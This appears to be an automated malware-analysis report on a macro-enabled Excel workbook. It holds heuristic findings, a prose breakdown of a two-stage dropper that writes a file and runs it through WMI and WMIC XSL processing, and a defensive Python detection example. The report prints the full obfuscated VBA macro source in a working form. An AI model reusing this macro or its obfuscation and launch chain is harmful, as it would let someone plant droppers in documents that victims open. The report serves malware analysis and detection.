MALICIOUS
Risk Score: 110
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an XLSM workbook carrying a VBA project (OOXML_VBA heuristic). Its Workbook_Open handler runs as soon as the document is opened with macros enabled, and every procedure in the project is padded with no-op Is*() calls (IsDate, IsNull, IsEmpty, IsMissing and so on) around the few statements that matter. Those statements form a local dropper, not a downloader: nothing in the extracted source contacts the network.

Stage one (UtDVyZVYaZ_K__CJt.FiTLPbiiunpbU_WahZIfBZwFp) reads the Text property of a control on the module Cx_tuSRjLwX_PYRaRb (its two-GUID VB_Base attribute is the signature of a UserForm), strips a filler string from it, and writes the result with Open ... For Binary / Put to a file in the workbook's own directory; the file name comes from worksheet cell FV88 through a chain of wrapper functions. Stage two (rHl_u_u_lticz) calls GetObject on a string taken from cell HQ154 and invokes .Create on the returned object, passing a command line, Null, and a second object obtained via GetObject(...).SpawnInstance_ on which ShowWindow has been set. That argument pattern is WMI's Win32_Process.Create with a Win32_ProcessStartup object, so the dropped file is launched through WMI (T1047) rather than a plain Shell call. The command line itself is assembled from decoy literals in MvrMYqwyVIiNxv_jTFtwu.CFLB_HA, gi_alhSIKiUjfmLIzb and S_jaRTeHFSIl and resolves to wmic os get /format:"<workbook path><dropped file>", i.e. WMIC XSL script processing (T1220) of the payload written in stage one.

None of the WMI monikers or commands exist as literals in the source. They are built at run time from Mid()/Replace() over junk strings, Chr()/ChrW() over floating-point arithmetic that CLng() rounds back to a character code, Xor/Or/And against Excel enumeration constants (xlTextMac, xlTimeLeadingZero, ...), and worksheet cell contents. ClamAV reports nothing, so the verdict rests on the heuristics below.
Heuristics (5)
- VBA project inside OOXML (medium, OOXML_VBA; 3 related findings): the document contains a VBA project, so VBA macros are present.
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script:
  Set ZXlHygmrQ_zk = GetObject(LVT__top.bHbPEdJrniXiybzJi).SpawnInstance_
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line (for this sample, Workbook_Open paired with GetObject).
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script:
  Private Sub Workbook_Open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

macros.bas

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8550 bytes |

SHA-256: 5bd6db8abd41d9221fe1cae37aee4976a2b63e28c8db986770803946c44800ed
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 132 of 249 identifiers look randomly generated (e.g. 'EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq'), consistent with name-mangling obfuscation.
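Two of the checks behind the findings above can be reproduced offline. The Python below is an added example, not the analyzer's own code: it applies the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule (token lists as given in the heuristic's description) and a name-mangling score of the kind behind the "identifiers look randomly generated" result to lines copied from the macros.bas preview on this page. The scoring signals and thresholds are this example's own assumptions, and the short benign macro is constructed for contrast. One caveat: the real heuristic runs over the compiled p-code/cache stream precisely because source may be unavailable; this version runs over decoded source, which is what a triage script usually has in hand.

```python
import re

# Two of the static checks this report fires, re-implemented as an added example (not the
# analyzer's own code): the auto-exec + execution token pairing behind
# OLE_VBA_PCODE_AUTOEXEC_EXEC, and a name-mangling score of the kind behind the "identifiers
# look randomly generated" finding. The token lists are the ones the heuristic description
# names; the scoring signals and thresholds are this example's assumptions.

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open", "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe", "URLDownloadToFile",
               "WinHttp", "XMLHTTP", "ADODB.Stream", "ShellExecute", "ExecuteExcel4Macro")
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]{4,}", re.I)


def find_tokens(text, tokens):
    """Case-insensitive whole-token matches; '.', '(' and whitespace may surround a token."""
    return [t for t in tokens
            if re.search(r"(?<![A-Za-z0-9_])%s(?![A-Za-z0-9_])" % re.escape(t), text, re.I)]


def autoexec_exec_pair(text):
    """The pairing rule: fires only when an auto-exec entry point AND an execution token co-occur."""
    auto, execs = find_tokens(text, AUTOEXEC_TOKENS), find_tokens(text, EXEC_TOKENS)
    return {"autoexec": auto, "exec": execs, "fires": bool(auto) and bool(execs)}


def looks_random(name):
    """Two of three signals: almost no vowels, a high case-flip rate, a long consonant or digit run."""
    core = name.replace("_", "")
    letters = [c for c in core if c.isalpha()]
    if len(letters) < 5 or core.isupper():          # too short to judge, or an all-caps constant
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in letters) / len(letters)
    flips = sum(a.isalpha() and b.isalpha() and a.islower() != b.islower() for a, b in zip(core, core[1:]))
    run = bool(CONSONANT_RUN.search(core)) or bool(re.search(r"[A-Za-z]\d+[A-Za-z]", core))
    signals = (vowel_ratio < 0.2, flips / len(letters) >= 0.4, run)
    return sum(signals) >= 2


def identifier_report(vba_source):
    """Distinct identifiers (keywords included, string literals removed) and the mangled-looking ones."""
    code = re.sub(r'"[^"]*"', '""', vba_source)      # cell references and decoy literals are not identifiers
    names = sorted(set(IDENT.findall(code)))
    return {"total": len(names), "mangled": [n for n in names if looks_random(n)]}


# Lines copied from the macros.bas preview on this page (the junk Is*() calls are part of the sample).
SAMPLE = '''Private Sub Workbook_Open()
CkJeVN = IsDate(PDThfuo)
l5pTYwq = IsDate(IsDate(KaQ60e))
UtDVyZVYaZ_K__CJt.FiTLPbiiunpbU_WahZIfBZwFp
End Sub
Function undKsrBKESQ()
fUYjgPZrwZTlY_Oo_Is = HqIHvR_RefJW_wfZZZ_FIzPkfi.EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq
undKsrBKESQ = Join(Array(fUYjgPZrwZTlY_Oo_Is))
End Function
Function ZXlHygmrQ_zk()
Set ZXlHygmrQ_zk = GetObject(LVT__top.bHbPEdJrniXiybzJi).SpawnInstance_
With ZXlHygmrQ_zk
.ShowWindow = CLng((((-17 - -17.2732558139535) * 1204) + -317))
End With
End Function
'''

# Constructed benign macro for contrast: auto-exec entry point, but no execution token.
BENIGN = '''Private Sub Workbook_Open()
Sheets("Summary").Range("A1").Value = Date
End Sub
'''

if __name__ == "__main__":
    print(autoexec_exec_pair(SAMPLE))
    print(autoexec_exec_pair(BENIGN))
    print(identifier_report(SAMPLE))
```

On the excerpt the pairing rule fires with Workbook_Open and GetObject, the benign macro does not fire because it lacks an execution token, and the identifier score flags the mangled names while leaving Workbook_Open, ActiveWorkbook-style names and the xl* constants alone.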
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
CkJeVN = IsDate(PDThfuo)
l5pTYwq = IsDate(IsDate(KaQ60e))
X95dkUQKIsNB = IsEmpty(svOKXMz0t48D)
UtDVyZVYaZ_K__CJt.FiTLPbiiunpbU_WahZIfBZwFp
aKxL5bv = IsDate(G71yDHUJ247v)
QtiWDN = IsError("Us5doL")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MvrMYqwyVIiNxv_jTFtwu"
Function IcqPO_SUcZ_fQeWK()
IsNull (MYfwSc_2XRuYW)
F7Jol37 = IsNull(IsDate(ZGNA1B4))
IsError ("Fm3QPp8")
IcqPO_SUcZ_fQeWK = Range("FV88")
KWNpSC0EwFL7 = IsEmpty("iwoep0HVIw04")
IsArray ("ZYqv1uB_pyb21i")
IsObject (IsNumeric("BZlJJ8W"))
End Function
Function CFLB_HA()
rkfWGE = IsArray(mrry7aHryYWM)
IlO1p5uBnVux = IsArray(IsNumeric("gv60K16JLNZ"))
IsMissing (IsNull("UxdP0z4_QRSG68"))
zdToFIj = IsObject(PLtn3h_BsLj4R)
Goij2xGIULk = IsDate(IsNumeric(YtUwrr3snbSi))
IsDate ("KZEx0Tv")
QCsnCZWasgZQSSWg_VRUU_x = gi_alhSIKiUjfmLIzb.dxlnSlJTzrg_yxLaFYrj_ufxTYyO
IsMissing (IsArray(GCx3mB_36UP4))
CFLB_HA = QCsnCZWasgZQSSWg_VRUU_x + S_jaRTeHFSIl.R_LyfsLexnXIlkM_Ae_lMYk + Mid("wrwcLIU8N+K:at:H9Zddf@", 13, 3)
IsMissing (IsMissing("Xmjd9Mr"))
IsError (IsMissing(YT2J0v5))
IsDate ("Run9B5B")
End Function
Attribute VB_Name = "Cx_tuSRjLwX_PYRaRb"
Attribute VB_Base = "0{164DA696-B550-473F-B420-DEAC0205DB47}{3A7BEEBF-9E3E-4EB3-B5D8-F0311285CC7A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function bMJIH_jfgHWIyJXeVFMQIij()
IsDate ("KTcaqzdU7Z58")
IK7qlt = IsEmpty(IsMissing("GJwe92"))
GsPSBm = IsDate(IsError(ZAKt936_xedOw))
ACad7C = IsObject("Tm7V1zXJqMTY")
IsNull (IsDate(Tn3vjT_qGysN))
YB9GXn_Vd39cu = IsArray(IsError("dcG2C8H"))
Fe7KRDKTGjPm = IsError(L40Cvz)
pRStfvfnl26wU = IsObject("QnPED1")
AKliyoU_8k8Vq = IsDate(UIZjW0)
X__NFyxzilhbPrUTTXAsqAvLmem_bH = MvrMYqwyVIiNxv_jTFtwu.IcqPO_SUcZ_fQeWK
IsNull (EVkrcXD)
bMJIH_jfgHWIyJXeVFMQIij = X__NFyxzilhbPrUTTXAsqAvLmem_bH
AQ2fEhD = IsDate("X5dIUUGew0gt")
R9MIeZ = IsDate("XZZtOxz")
GWMUnVC8DXM = IsMissing(JHmmnGa)
End Function
Function undKsrBKESQ()
IsNull (IsDate("bQOb4dm"))
IsNull (Ks5Ioe)
YFphdNN0zn4TK = IsNull("W8roOT_Glz4BA")
IsArray ("DdUWqa_2lnBD")
fUYjgPZrwZTlY_Oo_Is = HqIHvR_RefJW_wfZZZ_FIzPkfi.EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq
IsEmpty (IsArray("CB6rHom"))
PhxPnRX = IsObject(XO3z0Dmo2y3NL)
IsDate (RzpfhDO)
IsDate (IsError(RLdPMjj_RHFu5))
undKsrBKESQ = Join(Array(fUYjgPZrwZTlY_Oo_Is))
Snnlsd_hNIG4 = IsNumeric(OY8zpv)
pro6V2 = IsError(LiUvPeQ)
IsArray (Y7mCP3)
End Function
Attribute VB_Name = "S_jaRTeHFSIl"
Function PYtDVIIN_dWgjTMsKYW()
GJpZyZFuwzfK = IsMissing(IsNull("Cnt0V0w_CFaaN"))
IsNumeric ("VfDrVyw")
IsNull ("PlTUVC")
PYtDVIIN_dWgjTMsKYW = Range("CM223")
Xq0NmZl = IsDate("uydZefrfHKjG")
ditDk6t_KKarc8 = IsDate(vpPMmvHLqJpcx)
IsDate (IsMissing(m0M8rS))
End Function
Function R_LyfsLexnXIlkM_Ae_lMYk()
KS43xtSG0bik = IsNumeric("BsnQsr_68GgI")
R_LyfsLexnXIlkM_Ae_lMYk = Replace("o|01(o|01(o|01(o|01(o|01(et /form", "o|01(", "")
IsEmpty ("VDzPZq7")
g2Wtmpx = IsMissing(IsError(LYa3323))
End Function
Attribute VB_Name = "LVT__top"
Function bHbPEdJrniXiybzJi()
ye7oOxH = IsDate("q8vwSj")
EEJ7p0 = IsEmpty(IsObject(fHcSjZ0Inw1))
E2j5i80JlGo = IsEmpty("K3nC0CV")
Z8E1yD = IsDate(IsDate("Dmp71UfQa696"))
IsDate (IsEmpty("gB9yI9h_QvpS0L"))
IsError (TLXNL7AHOqw)
jnrwnFbB_HHllFxmaPUkVFPV_eIOrtn = Chr(118)
ls_XxLiDNIkLD = Chr(CLng(((1.39867109634551 * 602) + -728)))
NITxvSAp_OtdyiA = Chr(116)
oiPjcYtU = Chr(116)
IsDate (IsEmpty(wcsOqZ0T69I))
IsNumeric (IsArray("Tybe1KNfhH4a"))
MVSStEz = Chr(CLng(((-980 + (996 + -240#)) - -339)))
IsObject (IsObject(ExDH5zLHMo3r))
bObTESp_NKk = Chr(CLng((-698 - -781)))
vGDcWVO = Chr(CLng(((449 + -381#) Xor xlTimeLeadingZero)))
UYFgMF = IsError(IsObject(UDK4XJe_XuQM2))
fVpkUZpJjsMZu_vtfwlPvjooeW = ChrW(CLng((xlUnlockedCells Or ((-0.900952380952381 * xlDialogDataValidation) + 589#)))) _
X_N_UruH_Tmmi = ChrW(112)
CRnpjH = IsNumeric(IsArray("ovWJyL"))
bHbPEdJrniXiybzJi = S_jaRTeHFSIl.PYtDVIIN_dWgjTMsKYW & jnrwnFbB_HHllFxmaPUkVFPV_eIOrtn & ChrW(50) & ChrW(58) _
& Chr(CLng((xlPaper10x14 Or xlDialogScale))) _
& vGDcWVO & Chr(110) & Chr(CLng((48 Or xlTextMac))) _
& Chr(CLng(((0.806451612903226 * -775) + 675))) _
& Chr(CLng((xlCylinderBarClustered And (-0.25 * -508)))) & ChrW(CLng(((-746 - 168#) + 994))) & Chr(114) & ChrW(CLng((1067 + (0.634372926343729 * -1507)))) & Chr(CLng((xlMonthNameChars Xor 125))) & ChrW(CLng((0.163166397415186 * (0.462976813762154 * 1337)))) & MVSStEz & Chr(115) & bObTESp_NKk & NITxvSAp_OtdyiA & Chr(97) & ls_XxLiDNIkLD & oiPjcYtU & fVpkUZpJjsMZu_vtfwlPvjooeW & X_N_UruH_Tmmi
Jf76yWG = IsNumeric("QPSNcLo_u0CzkA")
Gf4oDo1ASmo = IsMissing(Y7EYOz)
Mk6lLkFqQ3lr = IsObject(FK24bPk)
End Function
Attribute VB_Name = "HqIHvR_RefJW_wfZZZ_FIzPkfi"
Attribute VB_Base = "0{E536D3F1-551F-4373-8AA1-04880FB3ED06}{6AACE69B-5E5D-49AF-B0C4-16BE44B0249D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ZXlHygmrQ_zk()
HQTkogbmzGne = IsArray("EpCq0d_KuBQG")
IsDate (IsArray("NP7Vk8_55z7oJ"))
z4Rray_jXXw0 = IsEmpty("YeECdCQ")
Set ZXlHygmrQ_zk = GetObject(LVT__top.bHbPEdJrniXiybzJi).SpawnInstance_
L2Zwvpx_1Dr7J = IsDate(IsError("s6tdLA"))
IsDate (xWoesGB_uuXnJ)
IsArray (IsNumeric(WiyfvC))
With ZXlHygmrQ_zk
.ShowWindow = CLng((((-17 - -17.2732558139535) * 1204) + -317))
End With
IsObject (Tznon6)
IsEmpty (IsDate("FmRWPM"))
jNogBm_qMUVI = IsError(IsNumeric(VKbtp9))
End Function
Function EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq()
IsMissing (IsDate("I4sKhe_gu027k"))
EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq = Range("HQ154")
IsEmpty (Qc9Nlr_wmuAn)
PYi80V2_Db3PRJ = IsMissing(IsEmpty("UI46o6S"))
End Function
Attribute VB_Name = "gi_alhSIKiUjfmLIzb"
Function dxlnSlJTzrg_yxLaFYrj_ufxTYyO()
IsMissing (Be4xM4)
IsDate ("JIgGjS_RqKUpn")
IsDate (IsNull("GGgm8R"))
dxlnSlJTzrg_yxLaFYrj_ufxTYyO = Mid("-kL$C6vQn !(wmic os g-1YsN4+T1h", 13, 9)
IsArray ("EhPRVe")
SUKb6qB_kvji1 = IsMissing(NO816B6b0BlP)
CSLSYWA = IsError(IsMissing(WU6CuSKw558R))
End Function
Attribute VB_Name = "UtDVyZVYaZ_K__CJt"
Function FiTLPbiiunpbU_WahZIfBZwFp()
Dim QjNmcoQ As String
IsDate (IsDate(H9bUuvZxd3WV))
IsError ("Gm4YMv01Ikd8")
QjNmcoQ = Replace(Cx_tuSRjLwX_PYRaRb.afx_o_NDWq.Text, "eJBQ_Y6Dnl ii", "")
IsMissing (IsEmpty(HjZmZFL_KzuKDg))
RZdhsB_2b3Y1F = IsEmpty("JVKtoz")
iVVQlQ = IsDate("nO0gnpX9wf0")
Open Application.ActiveWorkbook.Path & Cx_tuSRjLwX_PYRaRb.bMJIH_jfgHWIyJXeVFMQIij For Binary As #CLng((Not ((-330 + 670#) + -342#)))
ibWYW91 = IsNumeric(IsArray(Vh96PH))
IsDate (IsDate(Nvupgu19Dtfib))
Put #CLng((xlNoMailSystem Or xlCmdCube)), , QjNmcoQ
HDDJsPtgGHy2c = IsObject(IsEmpty(biS9jv_9XVkx))
yaTFFGk = IsError(IsNumeric("Pz7KC0kQXqM"))
Close #CLng(((-387 - -386.998863636364) * -880))
iM0MHyjXo2Jk = IsNull(TwmOjOY_7c314I)
OjazlkKnNvMe = IsDate("tk7v0zd_AwywW0")
rHl_u_u_lticz
niFirZ_ws66F = IsEmpty(mvPJXGR)
C0gDev = IsError(IsNumeric(P30lU1m))
End Function
Function rHl_u_u_lticz()
CXOnEEX = IsArray("JUNlqh_bT5qp")
IsEmpty ("MxDwWx_fxliP")
p8LyPql = IsArray("OyS0c9DnXem")
With GetObject(Cx_tuSRjLwX_PYRaRb.undKsrBKESQ)
.Create MvrMYqwyVIiNxv_jTFtwu.CFLB_HA & Chr(34) & Application.ActiveWorkbook.Path & Cx_tuSRjLwX_PYRaRb.bMJIH_jfgHWIyJXeVFMQIij & Chr(34), Null, HqIHvR_RefJW_wfZZZ_FIzPkfi.ZXlHygmrQ_zk
End With
IsMissing (IsError("NHqVWnr"))
IsDate ("OXqYZWi_eyKEj")
IsEmpty (IsDate(CIqi0xHr7A0C))
VfFoYZ3 = IsMissing("D3n1EKc_5n2x1n")
End Function
vbaProject_00.bin

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 65024 bytes |

SHA-256: 1377350ffff4a6f4da492480716c346a048aaa9d1e032fd1da68396831225d39